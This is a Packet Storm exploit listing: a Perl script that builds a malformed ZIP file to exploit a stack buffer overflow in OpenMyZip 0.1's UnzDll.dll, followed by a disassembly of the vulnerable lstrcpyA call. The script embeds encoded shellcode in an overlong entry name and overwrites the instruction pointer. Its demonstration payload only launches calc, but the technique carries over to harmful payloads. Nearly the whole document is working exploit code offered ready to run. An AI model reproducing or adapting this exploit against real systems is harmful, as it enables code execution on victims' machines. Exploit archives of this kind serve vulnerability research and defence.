OpenMyZip 0.1 .ZIP Buffer Overflow

2011-05-02T00:00:00
ID PACKETSTORM:101047
Type packetstorm
Reporter C4SS!0 G0M3S
Modified 2011-05-02T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
#  
#[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability  
#[+]Date: 02/05/2011 (2 May 2011)  
#[+]Author: C4SS!0 G0M3S  
#[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html  
#[+]Version: v0.1  
#[+]Tested On: WIN-XP SP3 Brazil Portuguese  
#[+]CVE: N/A  
#  
#  
#  
  
use strict;  
use warnings;  
  
my $filename = "Exploit.zip";  
  
  
print "\n\n\t\tOpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability\n";  
print "\t\tCreated by C4SS!0 G0M3S\n";  
print "\t\tE-mail Louredo_\@hotmail.com\n";  
print "\t\tSite www.exploit-br.org/\n\n";  
  
print "\n\n[+] Creting ZIP File...\n";  
sleep(1);  
my $head = "\x50\x4B\x03\x04\x14\x00\x00".  
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00" .  
"\xe4\x0f" .  
"\x00\x00\x00";  
  
my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".  
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\xe4\x0f".  
"\x00\x00\x00\x00\x00\x00\x01\x00".  
"\x24\x00\x00\x00\x00\x00\x00\x00";  
  
my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".  
"\x00\x01\x00\x01\x00".  
"\x12\x10\x00\x00".  
"\x02\x10\x00\x00".  
"\x00\x00";  
  
my $payload = "\x41" x 8;  
$payload = $payload.  
("\x61" x 7).#6 POPAD  
("\x6A\x30").#PUSH 30  
("\x5B\x52\x59").#POP EBX / PUSH EDX / POP ECX  
("\x41" x 10).#10 INC EAX  
("\x02\xd3").#ADD CL,BL  
("\x51\x58").#PUSH ECX / POP EAX  
("\x98\xd1"); #BASE CONVERSION  
#"\x98" == "\xff"  
# "\xd1" == "\xd0"   
#"\xff" + "\xd0" = CALL EAX AND CODE EXECUTION.;-}  
$payload .= "\x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE  
$payload .=  
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".  
"TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".  
"5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX  
"T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".  
"9K7OGT86OPYJ03K9GEU3OKXSKYZA";  
$payload .= "\x44" x (2050-length($payload));  
$payload .= "\x58\x78\x39".#POP EAX / JS SHORT 011E0098  
"\x41" x 5;# PADDING FOR OVERWRITE EIP  
$payload .= pack('V',0x00404042);#JMP EBX  
$payload .= "\x42" x 50;  
$payload .= "\x41" x (4064-length($payload));  
  
$payload = $payload.".txt";  
my $zip = $head.$payload.$head2.$payload.$head3;  
open(FILE,">$filename") || die "[-]Error:\n$!\n";  
print FILE $zip;  
close(FILE);  
print "[+] ZIP File Created With Sucess:)\n";  
sleep(2);  
=head  
#  
#The Vulnerable Function:  
#  
#  
#The vulnerable function lives in the module UnzDll.dll, at UnzDllExec+0x7a3.  
#It calls kernel32.lstrcpyA with no length check, copying the attacker-controlled  
#string (the ZIP entry name, passed in via [EBP+0x18]) into the fixed location  
#EBX+0x1C; a sufficiently long name overflows that buffer.  
#  
#Assemble:  
#  
# 0x00DA6A6F 53 PUSH EBX  
# 0x00DA6A70 56 PUSH ESI  
# 0x00DA6A71 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]  
# 0x00DA6A74 8B55 18 MOV EDX,DWORD PTR SS:[EBP+18]  
# 0x00DA6A77 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]  
# 0x00DA6A7A 83BE 8CD20000 00 CMP DWORD PTR DS:[ESI+D28C],0  
# 0x00DA6A81 8D9E 50D80000 LEA EBX,DWORD PTR DS:[ESI+D850]  
# 0x00DA6A87 74 65 JE SHORT UnzDll.00DA6AEE  
# 0x00DA6A89 8B8E 84D20000 MOV ECX,DWORD PTR DS:[ESI+D284]  
# 0x00DA6A8F 890B MOV DWORD PTR DS:[EBX],ECX  
# 0x00DA6A91 8B8E 88D20000 MOV ECX,DWORD PTR DS:[ESI+D288]  
# 0x00DA6A97 894B 04 MOV DWORD PTR DS:[EBX+4],ECX  
# 0x00DA6A9A 33C9 XOR ECX,ECX  
# 0x00DA6A9C C743 08 A0000000 MOV DWORD PTR DS:[EBX+8],0A0  
# 0x00DA6AA3 894B 0C MOV DWORD PTR DS:[EBX+C],ECX  
# 0x00DA6AA6 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C]  
# 0x00DA6AA9 894B 10 MOV DWORD PTR DS:[EBX+10],ECX  
# 0x00DA6AAC 81BE 88DB0000 91>CMP DWORD PTR DS:[ESI+DB88],91  
# 0x00DA6AB6 7F 0A JG SHORT UnzDll.00DA6AC2  
# 0x00DA6AB8 8BC8 MOV ECX,EAX  
# 0x00DA6ABA 80E1 FF AND CL,0FF  
# 0x00DA6ABD 0FBEC9 MOVSX ECX,CL  
# 0x00DA6AC0 EB 02 JMP SHORT UnzDll.00DA6AC4  
# 0x00DA6AC2 8BC8 MOV ECX,EAX  
# 0x00DA6AC4 894B 14 MOV DWORD PTR DS:[EBX+14],ECX  
# 0x00DA6AC7 85D2 TEST EDX,EDX  
# 0x00DA6AC9 8B45 14 MOV EAX,DWORD PTR SS:[EBP+14]  
# 0x00DA6ACC 8943 18 MOV DWORD PTR DS:[EBX+18],EAX  
# 0x00DA6ACF 75 06 JNZ SHORT UnzDll.00DA6AD7  
# 0x00DA6AD1 C643 1C 00 MOV BYTE PTR DS:[EBX+1C],0  
# 0x00DA6AD5 EB 0A JMP SHORT UnzDll.00DA6AE1  
# 0x00DA6AD7 52 PUSH EDX  
# 0x00DA6AD8 8D53 1C LEA EDX,DWORD PTR DS:[EBX+1C]  
# 0x00DA6ADB 52 PUSH EDX  
# 0x00DA6ADC E8 ABF20000 CALL UnzDll.00DB5D8C ; JMP to kernel32.lstrcpyA  
# 0x00DA6AE1 53 PUSH EBX  
# 0x00DA6AE2 FF96 8CD20000 CALL DWORD PTR DS:[ESI+D28C] ; code execution occurs here: the pointer loaded from [ESI+0xD28C] is called right after the overflowing copy (per the author)  
# 0x00DA6AE8 0986 70D20000 OR DWORD PTR DS:[ESI+D270],EAX  
# 0x00DA6AEE 5E POP ESI  
# 0x00DA6AEF 5B POP EBX  
# 0x00DA6AF0 5D POP EBP  
# 0x00DA6AF1 C3 RETN  
#  
#  
#  
#  
#  
=cut  
  
`